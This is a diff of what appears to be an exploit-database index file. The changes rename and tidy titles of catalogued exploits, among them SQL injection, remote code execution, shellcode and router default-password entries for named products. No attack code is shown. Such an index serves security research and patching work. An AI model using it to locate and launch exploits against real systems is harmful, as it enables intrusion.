38464,platforms/hardware/remote/38464.txt,"Cisco Linksys EA2700 Router - Multiple Security Vulnerabilities",2013-04-15,"Phil Purviance",hardware,remote,0 -38465,platforms/linux/dos/38465.txt,"Linux Kernel 3.2.1 - Tracing Mutiple Local Denial of Service Vulnerabilities",2013-04-15,anonymous,linux,dos,0 +38465,platforms/linux/dos/38465.txt,"Linux Kernel 3.2.1 - Tracing Multiple Local Denial of Service Vulnerabilities",2013-04-15,anonymous,linux,dos,0 38467,platforms/windows/local/38467.py,"AdobeWorkgroupHelper 2.8.3.3 - Stack Based Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0 38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bindshell 31173 port with Password Shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0 38470,platforms/hardware/webapps/38470.txt,"netis RealTek Wireless Router / ADSL Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0 38471,platforms/hardware/webapps/38471.txt,"PROLiNK H5004NK ADSL Wireless Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0 38472,platforms/windows/local/38472.py,"Blat 2.7.6 SMTP / NNTP Mailer - Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0 38473,platforms/linux/local/38473.py,"Linux 3.17 - noexec File Security Bypass (Python ctypes and memfd_create)",2015-10-15,soyer,linux,local,0 -38474,platforms/windows/local/38474.txt,"Windows 10 - Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",windows,local,0 +38474,platforms/windows/local/38474.txt,"Microsoft Windows 10 - Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",windows,local,0 38478,platforms/php/webapps/38478.txt,"Sosci Survey - Multiple Security Vulnerabilities",2013-04-17,"T. Lazauninkas",php,webapps,0 38479,platforms/asp/webapps/38479.txt,"Matrix42 Service Store - 'default.aspx' Cross-Site Scripting",2013-03-06,43zsec,asp,webapps,0 38480,platforms/php/webapps/38480.txt,"Fork CMS - 'file' Parameter Local File Inclusion",2013-04-18,"Rafay Baloch",php,webapps,0 38481,platforms/hardware/remote/38481.html,"D-Link DIR-865L - Cross-Site Request Forgery",2013-04-19,"Jacob Holcomb",hardware,remote,0 38482,platforms/php/webapps/38482.txt,"Crafty Syntax Live Help 3.1.2 - Remote File Inclusion / Full Path Disclosure",2013-04-19,ITTIHACK,php,webapps,0 38483,platforms/hardware/dos/38483.txt,"TP-Link TL-WR741N / TL-WR741ND Routers - Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0 -38484,platforms/php/webapps/38484.rb,"Wordpress Ajax Load More Plugin < 2.8.2 - Arbitrary File Upload",2015-10-18,PizzaHatHacker,php,webapps,0 +38484,platforms/php/webapps/38484.rb,"WordPress Ajax Load More Plugin < 2.8.2 - Arbitrary File Upload",2015-10-18,PizzaHatHacker,php,webapps,0 38485,platforms/windows/dos/38485.py,"VLC 2.2.1 libvlccore - '.mp3' Stack Overflow",2015-10-18,"Andrea Sindoni",windows,dos,0 38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow",2015-10-18,"yokoacc, nudragn, rungga_reksya",windows,local,0 -38487,platforms/php/webapps/38487.txt,"Wordpress Colormix Theme - Multiple Security Vulnerabilities",2013-04-21,MustLive,php,webapps,0 -38488,platforms/hardware/webapps/38488.txt,"Belkin Router N150 1.00.08 / 1.00.09 - Path Traversal",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0 +38487,platforms/php/webapps/38487.txt,"WordPress Colormix Theme - Multiple Security Vulnerabilities",2013-04-21,MustLive,php,webapps,0 +38488,platforms/hardware/webapps/38488.txt,"Belkin Router N150 1.00.08 / 1.00.09 - Directory Traversal",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0 38489,platforms/php/remote/38489.rb,"Nibbleblog - Arbitrary File Upload",2015-10-19,Metasploit,php,remote,0 38490,platforms/multiple/dos/38490.txt,"Adobe Flash IExternalizable.writeExternal - Type Confusion",2015-10-19,"Google Security Research",multiple,dos,0 38491,platforms/php/webapps/38491.php,"SMF - 'index.php' HTML Injection / Multiple PHP Code Injection Vulnerabilities",2013-04-23,"Jakub Galczyk",php,webapps,0 38492,platforms/hardware/remote/38492.html,"TP-Link TL-WR1043N Router - Cross-Site Request Forgery",2013-04-24,"Jacob Holcomb",hardware,remote,0 38493,platforms/hardware/dos/38493.txt,"Cisco Linksys WRT310N Router - Multiple Denial of Service Vulnerabilities",2013-04-23,"Carl Benedict",hardware,dos,0 -38494,platforms/php/webapps/38494.txt,"Wordpress WP Super Cache Plugin - Remote PHP Code Execution",2013-04-24,anonymous,php,webapps,0 +38494,platforms/php/webapps/38494.txt,"WordPress WP Super Cache Plugin - Remote PHP Code Execution",2013-04-24,anonymous,php,webapps,0 38495,platforms/hardware/remote/38495.html,"Belkin F5D8236-4 Router - Cross-Site Request Forgery",2013-04-25,"Jacob Holcomb",hardware,remote,0 38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0 -38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-based Blind SQL Injection",2015-10-19,LiquidWorm,php,webapps,0 +38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-Based Blind SQL Injection",2015-10-19,LiquidWorm,php,webapps,0 38498,platforms/windows/dos/38498.py,"Elecard MPEG Player - '.m3u' File Buffer Overflow",2013-04-27,metacom,windows,dos,0 38499,platforms/php/webapps/38499.html,"PHPValley Micro Jobs Site Script - Spoofing",2013-04-27,"Jason Whelan",php,webapps,0 38500,platforms/windows/remote/38500.php,"HTML Compiler - Remote Code Execution",2015-10-20,"Ehsan Noreddini",windows,remote,0 38501,platforms/hardware/remote/38501.txt,"Cisco Linksys E4200 - /apply.cgi Multiple Parameter Cross-Site Scripting",2013-04-27,"Carl Benedict",hardware,remote,0 -38502,platforms/php/webapps/38502.txt,"GetSimple CMS - /admin/edit.php Multiple Parameter Cross-Site Scripting",2013-05-01,"High-Tech Bridge",php,webapps,0 -38503,platforms/php/webapps/38503.txt,"GetSimple CMS - /admin/filebrowser.php Multiple Parameter Cross-Site Scripting",2013-05-01,"High-Tech Bridge",php,webapps,0 +38502,platforms/php/webapps/38502.txt,"Getsimple CMS - /admin/edit.php Multiple Parameter Cross-Site Scripting",2013-05-01,"High-Tech Bridge",php,webapps,0 +38503,platforms/php/webapps/38503.txt,"Getsimple CMS - /admin/filebrowser.php Multiple Parameter Cross-Site Scripting",2013-05-01,"High-Tech Bridge",php,webapps,0 38504,platforms/windows/local/38504.py,"HandyPassword 4.9.3 - SEH Over-Write Exploit",2015-10-21,Un_N0n,windows,local,0 38505,platforms/php/remote/38505.rb,"Zpanel - Remote Unauthenticated Remote Code Execution",2015-10-21,Metasploit,php,remote,0 38506,platforms/php/webapps/38506.txt,"NetApp OnCommand System Manager - /zapiServlet CIFS Configuration Management Interface Multiple Parameter Cross-Site Scripting",2013-05-07,"M. Heinzl",php,webapps,0 38507,platforms/php/webapps/38507.txt,"NetApp OnCommand System Manager - /zapiServlet User Management Interface Multiple Parameter Cross-Site Scripting",2013-05-07,"M. Heinzl",php,webapps,0 38508,platforms/php/webapps/38508.txt,"MyBB Game Section Plugin - 'games.php' Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,anonymous,php,webapps,0 38509,platforms/php/webapps/38509.txt,"Securimage - 'example_form.php' Cross-Site Scripting",2013-05-10,"Gjoko Krstic",php,webapps,0 -38510,platforms/php/webapps/38510.txt,"Wordpress Securimage-WP Plugin - 'siwp_test.php' Cross-Site Scripting",2013-05-11,"Gjoko Krstic",php,webapps,0 +38510,platforms/php/webapps/38510.txt,"WordPress Securimage-WP Plugin - 'siwp_test.php' Cross-Site Scripting",2013-05-11,"Gjoko Krstic",php,webapps,0 38511,platforms/php/webapps/38511.txt,"Gallery Server Pro - Arbitrary File Upload",2013-05-14,"Drew Calcott",php,webapps,0 38512,platforms/windows/remote/38512.php,"The World Browser 3.0 Final - Remote Code Execution",2015-10-22,"Ehsan Noreddini",windows,remote,0 -38513,platforms/windows/remote/38513.txt,"TeamSpeak Client 3.0.18.1 - Remote File Inclusion to Remote Code Execution Exploit",2015-10-22,Scurippio,windows,remote,0 -38514,platforms/hardware/webapps/38514.py,"Beckhoff CX9020 CPU Module - Remote Code Execution Exploit",2015-10-22,Photubias,hardware,webapps,0 -38515,platforms/php/webapps/38515.txt,"Wordpress wp-FileManager Plugin - 'path' Parameter Arbitrary File Download",2013-05-15,ByEge,php,webapps,0 +38513,platforms/windows/remote/38513.txt,"TeamSpeak Client 3.0.18.1 - Remote File Inclusion to Remote Code Execution",2015-10-22,Scurippio,windows,remote,0 +38514,platforms/hardware/webapps/38514.py,"Beckhoff CX9020 CPU Module - Remote Code Execution",2015-10-22,Photubias,hardware,webapps,0 +38515,platforms/php/webapps/38515.txt,"WordPress wp-FileManager Plugin - 'path' Parameter Arbitrary File Download",2013-05-15,ByEge,php,webapps,0 38516,platforms/php/webapps/38516.txt,"Open Flash Chart - 'get-data' Parameter Cross-Site Scripting",2013-05-14,"Deepankar Arora",php,webapps,0 -38517,platforms/php/webapps/38517.html,"Wordpress Mail On Update Plugin - Cross-Site Request Forgery",2013-05-16,"Henri Salo",php,webapps,0 +38517,platforms/php/webapps/38517.html,"WordPress Mail On Update Plugin - Cross-Site Request Forgery",2013-05-16,"Henri Salo",php,webapps,0 38518,platforms/php/webapps/38518.txt,"Jojo CMS - 'search' Parameter Cross-Site Scripting",2013-05-15,"High-Tech Bridge SA",php,webapps,0 -38519,platforms/php/webapps/38519.txt,"Jojo CMS - 'X-Forwarded-For' HTTP header SQL Injection",2013-05-15,"High-Tech Bridge SA",php,webapps,0 -38520,platforms/php/webapps/38520.html,"Wordpress WP Cleanfix Plugin - Cross-Site Request Forgery",2013-05-16,"Enigma Ideas",php,webapps,0 +38519,platforms/php/webapps/38519.txt,"Jojo CMS - 'x-forwarded-for' HTTP header SQL Injection",2013-05-15,"High-Tech Bridge SA",php,webapps,0 +38520,platforms/php/webapps/38520.html,"WordPress WP Cleanfix Plugin - Cross-Site Request Forgery",2013-05-16,"Enigma Ideas",php,webapps,0 38521,platforms/multiple/remote/38521.c,"Python RRDtool Module - Function Format String",2013-05-18,"Thomas Pollet",multiple,remote,0 38522,platforms/linux/remote/38522.txt,"Acme thttpd HTTP Server - Directory Traversal",2013-05-19,Metropolis,linux,remote,0 38523,platforms/php/webapps/38523.txt,"Weyal CMS - Multiple SQL Injections",2013-05-23,XroGuE,php,webapps,0 38524,platforms/php/webapps/38524.pl,"Matterdaddy Market - Multiple Security Vulnerabilities",2013-05-24,KedAns-Dz,php,webapps,0 -38525,platforms/php/webapps/38525.txt,"Subrion 3.X.X - Multiple Vulnerabilities",2015-10-23,bRpsd,php,webapps,0 +38525,platforms/php/webapps/38525.txt,"Subrion 3.X.x - Multiple Vulnerabilities",2015-10-23,bRpsd,php,webapps,0 38526,platforms/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote SEH Based Overflow",2015-10-23,Audit0r,windows,remote,0 38527,platforms/php/webapps/38527.txt,"Realtyna RPL Joomla Extension 8.9.2 - Multiple SQL Injections",2015-10-23,"Bikramaditya Guha",php,webapps,0 38528,platforms/php/webapps/38528.txt,"Realtyna RPL Joomla Extension 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2015-10-23,"Bikramaditya Guha",php,webapps,0 38572,platforms/php/webapps/38572.txt,"PHP Server Monitor 3.1.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-10-30,hyp3rlinx,php,webapps,0 38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - SEH Based Stack Overflow (ASLR + DEP Bypass)",2015-10-25,g00dv1n,windows,local,0 -38533,platforms/windows/local/38533.c,"Windows 10 - pcap Driver Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0 +38533,platforms/windows/local/38533.c,"Microsoft Windows 10 - pcap Driver Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0 38534,platforms/php/webapps/38534.php,"Joomla 3.2.x < 3.4.4 - SQL Injection",2015-10-26,"Manish Tanwar",php,webapps,0 38535,platforms/osx/remote/38535.rb,"Safari - User-Assisted Applescript Exec Attack",2015-10-26,Metasploit,osx,remote,0 38538,platforms/multiple/dos/38538.py,"Code::Blocks - Denial of Service",2013-05-29,ariarat,multiple,dos,0 -38644,platforms/windows/remote/38644.txt,"Solarwinds Log and Event Manager/Trigeo SIM 6.1.0 - Remote Command Execution",2015-11-06,"Chris Graham",windows,remote,0 +38644,platforms/windows/remote/38644.txt,"SolarWinds Log and Event Manager/Trigeo SIM 6.1.0 - Remote Command Execution",2015-11-06,"Chris Graham",windows,remote,0 38645,platforms/jsp/webapps/38645.txt,"NXFilter 3.0.3 - Cross-Site Request Forgery",2015-11-06,hyp3rlinx,jsp,webapps,0 -38540,platforms/osx/local/38540.rb,"Mac OSX 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0 +38540,platforms/osx/local/38540.rb,"Apple Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0 38541,platforms/php/remote/38541.rb,"Th3 MMA - mma.php Backdoor Arbitrary File Upload",2015-10-27,Metasploit,php,remote,80 38543,platforms/php/webapps/38543.txt,"PHP4dvd - 'config.php' PHP Code Injection",2012-05-31,"CWH Underground",php,webapps,0 38544,platforms/php/webapps/38544.txt,"Elastix - Multiple Cross-Site Scripting Vulnerabilities",2013-05-28,cheki,php,webapps,0 38545,platforms/php/webapps/38545.txt,"Telaen 2.7.x - Cross-Site Scripting",2013-06-04,"Manuel García Cárdenas",php,webapps,0 -38546,platforms/php/webapps/38546.txt,"Telaen 2.7.x - Open Redirection",2013-06-04,"Manuel García Cárdenas",php,webapps,0 +38546,platforms/php/webapps/38546.txt,"Telaen 2.7.x - Open redirection",2013-06-04,"Manuel García Cárdenas",php,webapps,0 38547,platforms/php/webapps/38547.txt,"CMS Gratis Indonesia - 'config.php' PHP Code Injection",2013-06-04,"CWH Underground",php,webapps,0 38548,platforms/php/webapps/38548.txt,"Telaen - Information Disclosure",2013-06-03,"Manuel García Cárdenas",php,webapps,0 38549,platforms/multiple/remote/38549.txt,"Apache Struts - OGNL Expression Injection",2013-06-05,"Jon Passki",multiple,remote,0 @@ -34843,7 +34846,7 @@ id,file,description,date,author,platform,type,port 38565,platforms/php/webapps/38565.txt,"Joomla JNews (com_jnews) Component 8.5.1 - SQL Injection",2015-10-29,"Omer Ramić",php,webapps,80 38566,platforms/hardware/dos/38566.py,"NetUSB - Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0 38567,platforms/php/webapps/38567.txt,"Max Forum - Multiple Security Vulnerabilities",2013-06-09,"CWH Underground",php,webapps,0 -38568,platforms/php/webapps/38568.txt,"Wordpress Ambience Theme - 'src' Parameter Cross-Site Scripting",2013-06-09,Darksnipper,php,webapps,0 +38568,platforms/php/webapps/38568.txt,"WordPress Ambience Theme - 'src' Parameter Cross-Site Scripting",2013-06-09,Darksnipper,php,webapps,0 38569,platforms/php/webapps/38569.txt,"Lokboard - 'index_4.php' PHP Code Injection",2013-06-10,"CWH Underground",php,webapps,0 38570,platforms/php/webapps/38570.txt,"ScriptCase - 'scelta_categoria.php' SQL Injection",2013-06-10,"Hossein Hezami",php,webapps,0 38571,platforms/php/webapps/38571.txt,"mkCMS - 'index.php' Arbitrary PHP Code Execution",2013-06-11,"CWH Underground",php,webapps,0 @@ -34854,15 +34857,15 @@ id,file,description,date,author,platform,type,port 38577,platforms/php/webapps/38577.txt,"Pligg CMS 2.0.2 - Multiple SQL Injections",2015-10-30,"Curesec Research Team",php,webapps,0 38578,platforms/php/webapps/38578.txt,"Pligg CMS 2.0.2 - Directory Traversal",2015-10-30,"Curesec Research Team",php,webapps,0 38579,platforms/php/webapps/38579.txt,"Pligg CMS 2.0.2 - Cross-Site Request Forgery Code Execution",2015-10-30,"Curesec Research Team",php,webapps,0 -38580,platforms/windows/dos/38580.txt,"Windows - NtCreateLowBoxToken Handle Capture Local Denial of Service/Elevation of Privilege (MS15-111)",2015-10-30,"Google Security Research",windows,dos,0 +38580,platforms/windows/dos/38580.txt,"Microsoft Windows - NtCreateLowBoxToken Handle Capture Local Denial of Service/Elevation of Privilege (MS15-111)",2015-10-30,"Google Security Research",windows,dos,0 38581,platforms/php/webapps/38581.txt,"Oxwall 1.7.4 - Cross-Site Request Forgery",2015-10-30,"High-Tech Bridge SA",php,webapps,0 38582,platforms/hardware/remote/38582.html,"Brickcom Multiple IP Cameras - Cross-Site Request Forgery",2013-06-12,Castillo,hardware,remote,0 38583,platforms/hardware/remote/38583.html,"Sony CH / DH Series IP Cameras - Multiple Cross-Site Request Forgery Vulnerabilities",2013-06-12,Castillo,hardware,remote,0 38584,platforms/hardware/remote/38584.txt,"Grandstream Multiple IP Cameras - Cross-Site Request Forgery",2013-06-12,Castillo,hardware,remote,0 -38585,platforms/php/webapps/38585.pl,"Wordpress NextGEN Gallery Plugin - 'upload.php' Arbitrary File Upload",2013-06-12,"Marcos Garcia",php,webapps,0 +38585,platforms/php/webapps/38585.pl,"WordPress NextGEN Gallery Plugin - 'upload.php' Arbitrary File Upload",2013-06-12,"Marcos Garcia",php,webapps,0 38586,platforms/android/remote/38586.txt,"TaxiMonger for Android - 'name' Parameter HTML Injection",2013-06-15,"Ismail Kaleem",android,remote,0 38587,platforms/multiple/remote/38587.txt,"Monkey HTTP Daemon Mandril Security Plugin - Security Bypass",2013-06-14,felipensp,multiple,remote,0 -38588,platforms/php/webapps/38588.php,"bloofoxCMS - 'index.php' Arbitrary File Upload",2013-06-17,"CWH Underground",php,webapps,0 +38588,platforms/php/webapps/38588.php,"BloofoxCMS - 'index.php' Arbitrary File Upload",2013-06-17,"CWH Underground",php,webapps,0 38589,platforms/linux/dos/38589.c,"Linux Kernel 3.0.5 - 'test_root()' Function Local Denial of Service",2013-06-05,"Jonathan Salwan",linux,dos,0 38590,platforms/php/webapps/38590.txt,"et-chat - Privilege Escalation / Arbitrary File Upload",2013-06-18,MR.XpR,php,webapps,0 38591,platforms/hardware/remote/38591.py,"TP-Link TL-PS110U Print Server - 'tplink-enum.py' Security Bypass",2013-06-19,SANTHO,hardware,remote,0 @@ -34873,17 +34876,17 @@ id,file,description,date,author,platform,type,port 38596,platforms/php/webapps/38596.txt,"Xaraya - Multiple Cross-Site Scripting Vulnerabilities",2013-06-26,"High-Tech Bridge",php,webapps,0 38597,platforms/multiple/remote/38597.txt,"Motion - Multiple Remote Security Vulnerabilities",2013-06-26,xistence,multiple,remote,0 38598,platforms/php/webapps/38598.txt,"ZamFoo - 'date' Parameter Remote Command Injection",2013-06-15,localhost.re,php,webapps,0 -38599,platforms/win_x86/remote/38599.py,"Symantec pcAnywhere 12.5.0 Windows x86 - Remote Code Execution",2015-11-02,"Tomislav Paskalev",win_x86,remote,0 +38599,platforms/win_x86/remote/38599.py,"Symantec pcAnywhere 12.5.0 Windows (x86) - Remote Code Execution",2015-11-02,"Tomislav Paskalev",win_x86,remote,0 38600,platforms/windows/local/38600.py,"Sam Spade 1.14 - (Crawl website) Buffer Overflow",2015-11-02,MandawCoder,windows,local,0 38601,platforms/windows/local/38601.py,"Sam Spade 1.14 - (Scan Addresses) Buffer Overflow",2015-11-02,VIKRAMADITYA,windows,local,0 38602,platforms/windows/webapps/38602.txt,"actiTIME 2015.2 - Multiple Vulnerabilities",2015-11-02,LiquidWorm,windows,webapps,0 38603,platforms/windows/local/38603.py,"TCPing 2.1.0 - Buffer Overflow",2015-11-02,hyp3rlinx,windows,local,0 38604,platforms/hardware/remote/38604.txt,"Mobile USB Drive HD - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities",2012-06-28,"Benjamin Kunz Mejri",hardware,remote,0 38605,platforms/php/webapps/38605.txt,"Nameko - 'nameko.php' Cross-Site Scripting",2013-06-29,"Andrea Menin",php,webapps,0 -38606,platforms/php/webapps/38606.txt,"Wordpress WP Private Messages Plugin - 'msgid' Parameter SQL Injection",2013-06-29,"IeDb ir",php,webapps,0 +38606,platforms/php/webapps/38606.txt,"WordPress WP Private Messages Plugin - 'msgid' Parameter SQL Injection",2013-06-29,"IeDb ir",php,webapps,0 38607,platforms/php/webapps/38607.txt,"Atomy Maxsite - 'index.php' Arbitrary File Upload",2013-06-30,Iranian_Dark_Coders_Team,php,webapps,0 38608,platforms/php/webapps/38608.txt,"Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 -38609,platforms/windows/local/38609.py,"Gold MP4 Player - .swf Local Exploit",2015-11-03,"Vivek Mahajan",windows,local,0 +38609,platforms/windows/local/38609.py,"Gold MP4 Player - '.swf' Local Exploit",2015-11-03,"Vivek Mahajan",windows,local,0 38610,platforms/android/dos/38610.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-11-03,"Google Security Research",android,dos,0 38611,platforms/android/dos/38611.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption",2015-11-03,"Google Security Research",android,dos,0 38612,platforms/android/dos/38612.txt,"Samsung Galaxy S6 - libQjpeg DoIntegralUpsample Crash",2015-11-03,"Google Security Research",android,dos,0 @@ -34892,23 +34895,23 @@ id,file,description,date,author,platform,type,port 38615,platforms/windows/dos/38615.txt,"Python 2.7 hotshot Module - pack_string Heap Buffer Overflow",2015-11-03,"John Leitch",windows,dos,0 38616,platforms/multiple/dos/38616.txt,"Python 2.7 array.fromstring Method - Use-After-Free",2015-11-03,"John Leitch",multiple,dos,0 38617,platforms/windows/dos/38617.txt,"Python 2.7 strop.replace() Method - Integer Overflow",2015-11-03,"John Leitch",windows,dos,0 -38618,platforms/windows/dos/38618.txt,"Python 3.3 < 3.5 product_setstate() Function - Out-of-bounds Read",2015-11-03,"John Leitch",windows,dos,0 +38618,platforms/windows/dos/38618.txt,"Python 3.3 < 3.5 product_setstate() Function - Out-of-Bounds Read",2015-11-03,"John Leitch",windows,dos,0 38631,platforms/windows/local/38631.txt,"McAfee Data Loss Prevention - Multiple Information Disclosure Vulnerabilities",2013-06-24,"Jamie Ooi",windows,local,0 38632,platforms/hardware/remote/38632.txt,"Multiple Zoom Telephonics Devices - Multiple Security Vulnerabilities",2013-07-09,"Kyle Lovett",hardware,remote,0 38630,platforms/php/webapps/38630.html,"phpVibe - Information Disclosure / Remote File Inclusion",2013-07-06,indoushka,php,webapps,0 38620,platforms/linux/dos/38620.txt,"FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap Based Out-of-Bounds Reads",2015-11-04,"Google Security Research",linux,dos,0 -38621,platforms/php/webapps/38621.txt,"Wordpress Xorbin Digital Flash Clock Plugin - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 +38621,platforms/php/webapps/38621.txt,"WordPress Xorbin Digital Flash Clock Plugin - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 38622,platforms/linux/dos/38622.txt,"libvirt - 'virConnectListAllInterfaces' Method Denial of Service",2013-07-01,"Daniel P. Berrange",linux,dos,0 38623,platforms/multiple/dos/38623.html,"RealNetworks RealPlayer - Denial of Service",2013-07-02,"Akshaysinh Vaghela",multiple,dos,0 -38624,platforms/php/webapps/38624.txt,"Wordpress WP Feed Plugin - 'nid' Parameter SQL Injection",2013-07-02,"Iranian Exploit DataBase",php,webapps,0 -38625,platforms/php/webapps/38625.txt,"Wordpress Category Grid View Gallery Plugin - 'ID' Parameter Cross-Site Scripting",2013-07-02,"Iranian Exploit DataBase",php,webapps,0 +38624,platforms/php/webapps/38624.txt,"WordPress WP Feed Plugin - 'nid' Parameter SQL Injection",2013-07-02,"Iranian Exploit DataBase",php,webapps,0 +38625,platforms/php/webapps/38625.txt,"WordPress Category Grid View Gallery Plugin - 'ID' Parameter Cross-Site Scripting",2013-07-02,"Iranian Exploit DataBase",php,webapps,0 38626,platforms/multiple/dos/38626.py,"FileCOPA FTP Server - Remote Denial of Service",2013-07-01,Chako,multiple,dos,0 38627,platforms/android/remote/38627.sh,"Google Android - 'APK' code Remote Security Bypass",2013-07-03,"Bluebox Security",android,remote,0 38628,platforms/php/webapps/38628.txt,"HostBill - 'cpupdate.php' Authentication Bypass",2013-05-29,localhost.re,php,webapps,0 -38629,platforms/php/webapps/38629.txt,"vBulletin 5.1.x - Pre-Authenticated Remote Code Execution Exploit",2015-11-05,hhjj,php,webapps,0 +38629,platforms/php/webapps/38629.txt,"vBulletin 5.1.x - Pre-Authentication Remote Code Execution",2015-11-05,hhjj,php,webapps,0 38642,platforms/php/webapps/38642.txt,"Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross-Site Scripting",2013-07-12,"Omar Kurt",php,webapps,0 38633,platforms/multiple/remote/38633.pl,"Intelligent Platform Management Interface - Information Disclosure",2013-07-02,"Dan Farmer",multiple,remote,0 -38634,platforms/ios/remote/38634.txt,"Air Drive Plus - Multiple Input Vallidation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",ios,remote,0 +38634,platforms/ios/remote/38634.txt,"Air Drive Plus - Multiple Input Validation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",ios,remote,0 38635,platforms/php/webapps/38635.txt,"iVote - 'details.php' SQL Injection",2013-07-10,"Ashiyane Digital Security Team",php,webapps,0 38636,platforms/multiple/remote/38636.txt,"Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure",2012-11-07,"Mario Heiderich",multiple,remote,0 38637,platforms/multiple/remote/38637.txt,"Cryptocat 2.0.22 - Arbitrary Script Injection",2012-11-07,"Mario Heiderich",multiple,remote,0 @@ -34916,9 +34919,9 @@ id,file,description,date,author,platform,type,port 38639,platforms/php/webapps/38639.txt,"miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities",2013-07-11,Netsparker,php,webapps,0 38640,platforms/multiple/webapps/38640.rb,"OpenSSL - Alternative Chains Certificate Forgery",2015-11-05,"Ramon de C Valle",multiple,webapps,0 38641,platforms/multiple/webapps/38641.rb,"JSSE - SKIP-TLS Exploit",2015-11-05,"Ramon de C Valle",multiple,webapps,0 -38643,platforms/php/webapps/38643.txt,"Wordpress Pie Register Plugin - 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0 +38643,platforms/php/webapps/38643.txt,"WordPress Pie Register Plugin - 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0 38646,platforms/jsp/webapps/38646.txt,"NXFilter 3.0.3 - Multiple Cross-Site Scripting Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps,0 -38648,platforms/php/webapps/38648.txt,"Wordpress My Calendar Plugin 2.4.10 - Multiple Vulnerabilities",2015-11-06,Mysticism,php,webapps,0 +38648,platforms/php/webapps/38648.txt,"WordPress My Calendar Plugin 2.4.10 - Multiple Vulnerabilities",2015-11-06,Mysticism,php,webapps,0 38649,platforms/php/webapps/38649.txt,"Google AdWords API PHP client library 6.2.0 - Arbitrary PHP Code Execution",2015-11-07,"Dawid Golunski",php,webapps,0 38650,platforms/windows/dos/38650.py,"QNap QVR Client 5.1.0.11290 - Crash (PoC)",2015-11-07,"Luis Martínez",windows,dos,0 38651,platforms/php/webapps/38651.txt,"eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Potential Code Execution / Denial of Service)",2015-11-07,"Dawid Golunski",php,webapps,0 @@ -34928,15 +34931,15 @@ id,file,description,date,author,platform,type,port 38655,platforms/asp/webapps/38655.txt,"Corda .NET Redirector - 'redirector.corda' Cross-Site Scripting",2013-07-12,"Adam Willard",asp,webapps,0 38656,platforms/php/webapps/38656.html,"PrestaShop - Multiple Cross-Site Request Forgery Vulnerabilities",2013-07-11,"EntPro Cyber Security Research Group",php,webapps,0 38657,platforms/hardware/webapps/38657.html,"Arris TG1682G Modem - Persistent Cross-Site Scripting",2015-11-09,Nu11By73,hardware,webapps,0 -39374,platforms/osx/dos/39374.c,"OS X Kernel - IOAccelMemoryInfoUserClient Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 +39374,platforms/osx/dos/39374.c,"Apple Mac OS X - Kernel IOAccelMemoryInfoUserClient Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 38659,platforms/windows/dos/38659.py,"POP Peeper 4.0.1 - SEH Over-Write",2015-11-09,Un_N0n,windows,dos,0 -38660,platforms/php/remote/38660.rb,"Wordpress Ajax Load More 2.8.1.1 Plugin - PHP Upload",2015-11-09,Metasploit,php,remote,0 +38660,platforms/php/remote/38660.rb,"WordPress Ajax Load More 2.8.1.1 Plugin - PHP Upload",2015-11-09,Metasploit,php,remote,0 38661,platforms/php/webapps/38661.txt,"TestLink 1.9.14 - Cross-Site Request Forgery",2015-11-09,"Aravind C Ajayan, Balagopal N",php,webapps,0 38662,platforms/multiple/dos/38662.txt,"FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Based Out-of-Bounds Read",2015-11-09,"Google Security Research",multiple,dos,0 38663,platforms/hardware/remote/38663.txt,"Huawei HG630a and HG630a-50 - Default SSH Admin Password on ADSL Modems",2015-11-10,"Murat Sahin",hardware,remote,0 